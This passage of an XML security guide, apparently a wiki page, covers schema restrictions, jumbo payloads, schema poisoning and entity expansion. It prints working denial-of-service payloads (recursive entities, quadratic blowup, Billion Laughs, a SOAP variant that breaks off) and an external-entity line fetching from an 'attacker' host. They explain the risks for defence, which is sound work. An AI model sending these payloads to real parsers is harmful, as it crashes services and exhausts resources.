 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
